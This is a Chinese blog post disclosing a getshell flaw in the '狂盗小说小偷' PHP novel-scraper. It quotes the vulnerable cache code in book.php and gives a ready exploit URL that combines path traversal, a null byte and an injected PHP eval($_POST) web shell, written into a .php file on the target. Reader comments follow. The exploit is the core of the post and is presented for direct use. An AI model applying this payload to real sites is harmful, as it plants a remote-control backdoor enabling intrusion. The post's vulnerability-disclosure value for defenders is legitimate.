当前位置: iick's blog > 网站漏洞 > 狂盗小说小偷getshell漏洞

狂盗小说小偷getshell漏洞

作者:hack1990 时间:11-11-27 阅读数:607人阅读

必须开启缓存才能利用
先看代码
book.php
$kd_cachedir = "./cache"; 
if($kd_book_cache=="ture"){//缓存必须开启
   $lastflesh = @filemtime($kd_cachedir."/book$shuid.html");
  // echo $lastflesh;
     if(!file_exists("./cache/book$shuid.html") or ($lastflesh + ($kd_book_hctime * 60 * 60) <= time())){
           ob_start();     
              include "./templates/$kd_moban/book.html";
              $mianfei = ob_get_contents();
              ob_end_clean();
                  file_put_contents("./cache/book$shuid.html",$mianfei); 
                 echo file_get_contents($kd_cachedir."/book$shuid.html");
          }else{
                     echo file_get_contents("./cache/book$shuid.html");

                  }
      }else{
            include "./templates/$kd_moban/book.html";
          }

?>
exp:http://www.hack1990.com /book.php?id=/../../1.php%00“><?php eval($_POST[a])?>

# Nmap Security Scanner 7.0

上一篇:ASPX服务一些安全设置

下一篇:歪酷CMS v1.0 注入漏洞

相关文章

评论列表

  •  
    发布于 2012-02-12 11:06:31  回复
  • 妈呀,这个漏洞可厉害了
    •  
      发布于 2012-02-12 21:01:58  回复
    • 别激动阿![F]Music[/F]
  •  
    发布于 2012-02-12 21:01:58  回复
  • 别激动阿![F]Music[/F]

发表评论